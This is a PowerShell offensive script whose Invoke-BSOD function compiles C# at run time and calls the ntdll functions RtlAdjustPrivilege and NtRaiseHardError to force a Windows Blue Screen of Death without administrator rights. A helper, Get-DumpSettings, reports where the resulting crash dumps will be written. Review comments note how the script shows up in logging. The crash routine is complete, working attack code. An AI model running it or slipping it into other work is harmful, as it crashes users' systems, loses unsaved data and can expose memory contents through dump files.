function Invoke-BSOD {
<#
.SYNOPSIS
Invokes a Blue Screen of Death on Windows without requiring admin privileges.
Author: Barrett Adams (@peewpw)
.DESCRIPTION
Raises an error that causes a Blue Screen of Death on Windows. It does this without
requiring administrator privileges.

The function compiles a small C# class (CS) at run time with Add-Type and then calls
its static Kill() method. Kill() makes two ntdll.dll calls through P/Invoke:
RtlAdjustPrivilege followed by NtRaiseHardError. Neither return value is checked and
the function returns nothing to the caller.
.EXAMPLE
PS>Import-Module .\Invoke-BSOD.ps1
PS>Invoke-BSOD
(Blue Screen Incoming...)
.NOTES
Observable artifacts, for anyone reviewing or monitoring for this script: the whole
function body, including the embedded C# text with the "ntdll.dll" DllImport
declarations, is ordinary script text, so PowerShell script block logging records it
when enabled. The -CompilerParameters argument to Add-Type is the CodeDom-based
compile path; NOTE(review): on Windows PowerShell this is expected to launch the C#
compiler as a child process - confirm on the target version.
#>
# C# source handed to Add-Type below. The here-string is passed to the compiler as-is,
# so it is left untouched; the values used in Kill() are:
#   RtlAdjustPrivilege(19, true, false, ...)
#       19 is SeShutdownPrivilege; bEnablePrivilege = true, IsThreadPrivilege = false.
#   NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, ...)
#       0xc0000022 is STATUS_ACCESS_DENIED; response option 6 is OptionShutdownSystem.
# NOTE(review): the "no admin" claim presumably rests on the calling account already
# holding the "Shut down the system" user right, which RtlAdjustPrivilege only enables;
# verify against the user-rights assignment on the hosts you care about.
# NOTE(review): Kill() is declared 'unsafe' but contains no pointer code in the visible
# source, so the '/unsafe' compiler option below exists only to accept that modifier.
$source = @"
using System;
using System.Runtime.InteropServices;
public static class CS{
[DllImport("ntdll.dll")]
public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
[DllImport("ntdll.dll")]
public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
public static unsafe void Kill(){
Boolean tmp1;
uint tmp2;
RtlAdjustPrivilege(19, true, false, out tmp1);
NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);
}
}
"@
# Compiler settings object; only CompilerOptions is set.
$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters
$comparams.CompilerOptions = '/unsafe'
# Compile the C# text into the current session. $a receives the emitted type because of
# -PassThru but is not read again; the type is reached by name on the next line.
$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams
# Runs the two native calls described above.
[CS]::Kill()
}
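function Get-DumpSettings {
<#
.SYNOPSIS
Gets the crash dump settings
Author: Barrett Adams (@peewpw)
.DESCRIPTION
Queries the registry for crash dump settings so that you'll have some idea
what type of dump you're going to generate, and where it will be.

Reads HKLM:\System\CurrentControlSet\Control\CrashControl and translates the raw
values into a hashtable. The function only reads the registry; it changes nothing.

A dump file is a copy of system memory, so the reported DumpFileLocation is a path
whose access rights and retention are worth reviewing.
.OUTPUTS
System.Collections.Hashtable with the keys CrashDumpMode, DumpFileLocation, AutoReboot,
OverwritePrevious, AutoDeleteWhenLowSpace and SystemLogEvent.
.EXAMPLE
PS>Import-Module .\Invoke-BSOD.ps1
PS>Get-DumpSettings
#>
    $regdata = Get-ItemProperty -path HKLM:\System\CurrentControlSet\Control\CrashControl
    $dumpsettings = @{}

    # CrashDumpEnabled selects the dump type. 0 means dump generation is turned off;
    # it is reported as "None" so a disabled configuration is not mistaken for an
    # unrecognised one.
    $dumpsettings.CrashDumpMode = switch ($regdata.CrashDumpEnabled) {
        0 {"None"}
        # Value 1 covers two modes; FilterPages distinguishes them.
        1 { if ($regdata.FilterPages) { "Active Memory Dump" } else { "Complete Memory Dump" } }
        2 {"Kernel Memory Dump"}
        3 {"Small Memory Dump"}
        7 {"Automatic Memory Dump"}
        default {"Unknown"}
    }

    $dumpsettings.DumpFileLocation = $regdata.DumpFile

    # The remaining registry values are 0/1 flags (or absent); cast them to booleans.
    [bool]$dumpsettings.AutoReboot = $regdata.AutoReboot
    [bool]$dumpsettings.OverwritePrevious = $regdata.Overwrite
    # The registry stores "always keep", the result reports the opposite sense.
    [bool]$dumpsettings.AutoDeleteWhenLowSpace = -not $regdata.AlwaysKeepMemoryDump
    [bool]$dumpsettings.SystemLogEvent = $regdata.LogEvent

    $dumpsettings
}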